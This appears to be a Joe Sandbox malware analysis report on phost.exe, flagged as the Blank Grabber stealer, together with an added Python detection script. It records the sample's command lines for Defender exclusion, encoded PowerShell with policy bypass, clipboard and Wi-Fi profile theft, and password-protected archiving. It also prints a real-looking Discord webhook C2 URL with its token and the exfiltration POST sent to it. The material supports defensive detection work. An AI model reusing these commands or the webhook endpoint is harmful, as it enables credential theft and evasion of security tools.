Source: Process started; Author: @ROxPinTeddy; Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\C7XW6.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\C7XW6.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\phost.exe", ParentImage: C:\Users\user\Desktop\phost.exe, ParentProcessId: 3444, ParentProcessName: phost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\C7XW6.zip" *", ProcessId: 7500, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community; Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: File created; Author: Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Users\user\Desktop\phost.exe, ProcessId: 3444, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr
Source: Process started; Author: frack113; Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: Process started; Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems); Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\phost.exe", ParentImage: C:\Users\user\Desktop\phost.exe, ParentProcessId: 3444, ParentProcessName: phost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7544, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\phost.exe", ParentImage: C:\Users\user\Desktop\phost.exe, ParentProcessId: 3444, ParentProcessName: phost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'", ProcessId: 1136, ProcessName: cmd.exe
Source: File created; Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io; Data: EventID: 11, Image: C:\Users\user\Desktop\phost.exe, ProcessId: 3444, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr
Source: File created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: EventID: 11, Image: C:\Users\user\Desktop\phost.exe, ProcessId: 3444, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
Source: Process started; Author: frack113; Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Users\user\Desktop\phost.exe, ProcessId: 3444, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7400, TargetFilename: C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.cmdline
Source: Process started; Author: Timur Zinniatullin, E.M. Anhaus, oscd.community; Data: Command: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\C7XW6.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\C7XW6.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\C7XW6.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7500, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\C7XW6.zip" *, ProcessId: 7412, ProcessName: rar.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1136, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe', ProcessId: 3140, ProcessName: powershell.exe
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7620, ProcessName: svchost.exe

              Data Obfuscation

              Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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

              Stealing of Sensitive Information

              Source: Process started | Author: Joe Security | Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\phost.exe", ParentImage: C:\Users\user\Desktop\phost.exe, ParentProcessId: 3444, ParentProcessName: phost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 7748, ProcessName: cmd.exe
              No Suricata rule has matched
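              The Sigma matches above and the ip-api.com and Discord webhook requests recorded in the network section further down translate directly into host-side and proxy-side detection logic. The Python below is an added example, not Joe Sandbox output, Sigma rule content or Blank Grabber code. Every event in it is constructed from this report: the process command lines are copied from the Sigma entries, the -EncodedCommand payload is a stand-in built locally because the report does not reproduce the real one, the StartUp filename is a placeholder because the report's is not readable, and the webhook token is elided. One caveat when reading the network section: the webhook POST in this run was answered with HTTP 404, so the 759,276-byte multipart upload did not reach a live webhook, but the attempt itself, together with the preceding ip-api.com hosting lookup used to detect data-center sandboxes, is exactly what the proxy-side rules key on.

```python
"""Detection logic for the behaviours Joe Sandbox recorded for phost.exe (Blank Grabber).
Added example for this page, not Joe Sandbox, Sigma or Blank Grabber code. All events are
constructed (Sysmon EID 1/11 field names, proxy-log shape) from the report's own entries."""
import base64
import re

# Constructed stand-in for the -EncodedCommand payload (the report elides the real one).
ENCODED_PAYLOAD = base64.b64encode(
    "Add-MpPreference -ExclusionPath 'C:\\Users\\user\\Desktop\\phost.exe'".encode("utf-16-le")
).decode("ascii")

PROCESS_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand " + ENCODED_PAYLOAD},
    {"Image": r"C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe",
     "CommandLine": r'C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\C7XW6.zip" *'},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.cmdline"'},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'C:\Windows\system32\cmd.exe /c "netsh wlan show profile"'},
    {"Image": r"C:\Windows\System32\netsh.exe", "CommandLine": "netsh interface show interface"},  # benign control
]
FILE_EVENTS = [  # the report's StartUp filename is unreadable, so a placeholder name stands in
    {"Image": r"C:\Users\user\Desktop\phost.exe",
     "TargetFilename": r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\placeholder.scr"},
    {"Image": r"C:\Windows\System32\msiexec.exe",  # benign control: installer shortcut
     "TargetFilename": r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Vendor Tray.lnk"},
]
HTTP_EVENTS = [  # webhook token elided
    {"method": "GET", "host": "ip-api.com", "path": "/line/?fields=hosting", "content_type": ""},
    {"method": "GET", "host": "ip-api.com", "path": "/json/?fields=225545", "content_type": ""},
    {"method": "POST", "host": "discord.com", "path": "/api/webhooks/1267176433306829014/<token>",
     "content_type": "multipart/form-data; boundary=d86edcfe5e1bf83a434b434f5a1b347a"},
    {"method": "GET", "host": "discord.com", "path": "/app", "content_type": ""},  # benign control
]


def decode_encoded_command(cmdline):
    """Decode a -e/-ec/-enc/-EncodedCommand payload (base64 of UTF-16LE); None if absent or malformed."""
    m = re.search(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # not valid base64, or not UTF-16LE text
        return None


# (rule name, allowed image basenames or None, regex run over the command line plus decoded payload)
CMDLINE_RULES = [
    ("defender_exclusion_or_disable", {"powershell.exe", "pwsh.exe", "cmd.exe"},
     r"\b(?:Add|Set)-MpPreference\b.*?-(?:Exclusion|Disable)\w+"),
    ("rar_password_protected_archive", {"rar.exe", "winrar.exe"}, r"(?:^|\s)a\s.*\s-h?p\S"),
    ("csc_compile_from_temp", {"csc.exe"}, r"\\AppData\\Local\\Temp\\"),
    ("wlan_profile_enumeration", None, r"netsh\s+wlan\s+show\s+profiles?"),
    ("clipboard_capture", None, r"\bGet-Clipboard\b"),
]


def match_process(ev):
    """Names of the CMDLINE_RULES one process event trips, evaluated after base64 decoding."""
    decoded = decode_encoded_command(ev["CommandLine"])
    text = ev["CommandLine"] + " " + (decoded or "")
    image = ev["Image"].lower().rsplit("\\", 1)[-1]
    hits = [name for name, images, rx in CMDLINE_RULES
            if (images is None or image in images) and re.search(rx, text, re.I)]
    if decoded is not None and re.search(r"-ExecutionPolicy\s+Bypass", ev["CommandLine"], re.I):
        hits.append("encoded_powershell_policy_bypass")
    return hits


def is_startup_payload(ev):
    # .lnk is what installers legitimately drop here; executables and scripts are the signal.
    target = ev["TargetFilename"].lower()
    return ("\\start menu\\programs\\startup\\" in target
            and target.endswith((".scr", ".exe", ".bat", ".cmd", ".vbs", ".js", ".ps1")))


def evaluate(process_events, file_events, http_events):
    """Return {rule name: [indices of matching events]} over the three event streams."""
    hits = {}
    def add(name, i): hits.setdefault(name, []).append(i)
    for i, ev in enumerate(process_events):
        for name in match_process(ev):
            add(name, i)
    for i, ev in enumerate(file_events):
        if is_startup_payload(ev):
            add("startup_folder_payload", i)
    for i, ev in enumerate(http_events):
        if ev["host"] == "ip-api.com" and "fields=hosting" in ev["path"]:
            add("ip_api_hosting_check", i)  # data-center / sandbox check before stealing
        if (ev["method"] == "POST" and ev["host"] == "discord.com"
                and ev["path"].startswith("/api/webhooks/") and ev["content_type"].startswith("multipart/form-data")):
            add("discord_webhook_multipart_upload", i)
    return hits


if __name__ == "__main__":
    for name, idx in evaluate(PROCESS_EVENTS, FILE_EVENTS, HTTP_EVENTS).items():
        print(f"{name}: events {idx}")
```

              The decode step is the point of the example: the Add-MpPreference rule fires twice, once on the plain command line and once on the base64 variant that only becomes visible after UTF-16LE decoding, which is what the base64offset modifier in the cited Sigma rule approximates without decoding. The .lnk exclusion in the StartUp rule is a deliberate trade-off: installers legitimately drop shortcuts there, while a bare .scr written by an executable running from the user's Desktop is not normal.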

              AV Detection

              Source: phost.exe.3444.1.memstrmin | Malware Configuration Extractor: Blank Grabber {"C2 url": "https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMG"}
              Source: phost.exe | ReversingLabs: Detection: 34%
              Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe | Code function: 105_2_00007FF6BBCC901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,105_2_00007FF6BBCC901C
              Source: phost.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: phost.exe, 00000001.00000002.2186287138.00007FFE13301000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: phost.exe, 00000001.00000002.2183769002.00007FFDFB5E4000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.pdb source: powershell.exe, 0000004A.00000002.1977970654.000001C716F45000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: phost.exe, 00000001.00000002.2181473633.00007FFDFAA4F000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: phost.exe, 00000001.00000002.2185911655.00007FFE126D1000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: phost.exe, 00000001.00000002.2186466073.00007FFE13337000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: phost.exe, 00000001.00000002.2182012279.00007FFDFAAE5000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.11 19 Sep 20233.0.11built on: Wed Sep 27 22:33:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: phost.exe, 00000001.00000002.2182736521.00007FFDFB052000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: phost.exe, 00000001.00000002.2185661990.00007FFE1151C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: phost.exe, phost.exe, 00000001.00000002.2182736521.00007FFDFB052000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: t.pdb source: powershell.exe, 0000004A.00000002.2038143526.000001C72DD50000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: phost.exe, 00000001.00000002.2186119387.00007FFE130C1000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: phost.exe, 00000001.00000002.2185661990.00007FFE1151C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: phost.exe, 00000001.00000002.2185499865.00007FFE10301000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: phost.exe, 00000000.00000003.1675759091.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2187104659.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.pdbhP source: powershell.exe, 0000004A.00000002.1977970654.000001C716F45000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: phost.exe, 00000000.00000003.1675759091.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2187104659.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: phost.exe, phost.exe, 00000001.00000002.2182380751.00007FFDFAB31000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: phost.exe, 00000001.00000002.2184947186.00007FFE101D1000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: phost.exe, 00000001.00000002.2185223962.00007FFE10241000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: phost.exe, phost.exe, 00000001.00000002.2182012279.00007FFDFAAE5000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000069.00000000.2046278309.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp, rar.exe, 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: phost.exe, 00000001.00000002.2184701934.00007FFE0EB31000.00000040.00000001.01000000.00000010.sdmp
              Source: C:\Users\user\Desktop\phost.exe | Code function: 0_2_00007FF62CC792F0 FindFirstFileExW,FindClose,0_2_00007FF62CC792F0
              Source: C:\Users\user\Desktop\phost.exe | Code function: 0_2_00007FF62CC783B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF62CC783B0
              Source: C:\Users\user\Desktop\phost.exe | Code function: 0_2_00007FF62CC918E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF62CC918E4
              Source: C:\Users\user\Desktop\phost.exe | Code function: 1_2_00007FF62CC792F0 FindFirstFileExW,FindClose,1_2_00007FF62CC792F0
              Source: C:\Users\user\Desktop\phost.exe | Code function: 1_2_00007FF62CC918E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF62CC918E4
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe | Code function: 105_2_00007FF6BBCD46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,105_2_00007FF6BBCD46EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe | Code function: 105_2_00007FF6BBCCE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,105_2_00007FF6BBCCE21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe | Code function: 105_2_00007FF6BBD188E0 FindFirstFileExA,105_2_00007FF6BBD188E0
              Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\
              Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\
              Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\
              Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\
              Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\
              Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\
              Source: unknown | DNS query: name: ip-api.com
              Source: unknown | DNS query: name: ip-api.com
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1
                  Host: ip-api.com
                  Accept-Encoding: identity
                  User-Agent: python-urllib3/2.2.3
              Source: global traffic | HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1
                  Host: ip-api.com
                  Accept-Encoding: identity
                  User-Agent: python-urllib3/2.2.3
              Source: phost.exe, 00000001.00000002.2179183258.000001AE1DC84000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
              Source: global traffic | DNS traffic detected: DNS query: blank-c9yfy.in
              Source: global traffic | DNS traffic detected: DNS query: ip-api.com
              Source: global traffic | DNS traffic detected: DNS query: discord.com
              Source: unknown | HTTP traffic detected: POST /api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMG HTTP/1.1
                  Host: discord.com
                  Accept-Encoding: identity
                  Content-Length: 759276
                  User-Agent: python-urllib3/2.2.3
                  Content-Type: multipart/form-data; boundary=d86edcfe5e1bf83a434b434f5a1b347a
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                  Date: Fri, 13 Dec 2024 07:42:31 GMT
                  Content-Type: application/json
                  Content-Length: 45
                  Connection: close
                  Cache-Control: public, max-age=3600, s-maxage=3600
                  strict-transport-security: max-age=31536000; includeSubDomains; preload
                  x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                  x-ratelimit-limit: 5
                  x-ratelimit-remaining: 4
                  x-ratelimit-reset: 1734075752
                  x-ratelimit-reset-after: 1
                  via: 1.1 google
                  alt-svc: h3=":443"; ma=86400
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bba3f1%2FZudwJQkFnKMdEqfZPnm6iBU18h3o3V9HzDakAlD5TEPANc%2BJkkp4mRZbicFS%2BglfWhSxd5p311G2JhLOYuxaDo7M3Dq5SOiR%2BQaH2o1Dt9emz1wTDcHLh"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  X-Content-Type-Options: nosniff
                  Set-Cookie: __cfruid=d7c98e932c69185b4fd952897188f4a54139cb30-1734075751; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                  Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                  Set-Cookie: _cfuvid=E0fT_eR75aZoCbniOOZ.Jl5rOKtvPVKzo2aCeNNnf0A-1734075751127-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8f14515d1ed40cb2-EWR
              Source: phost.exe, 00000000.00000003.1678758922.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digi
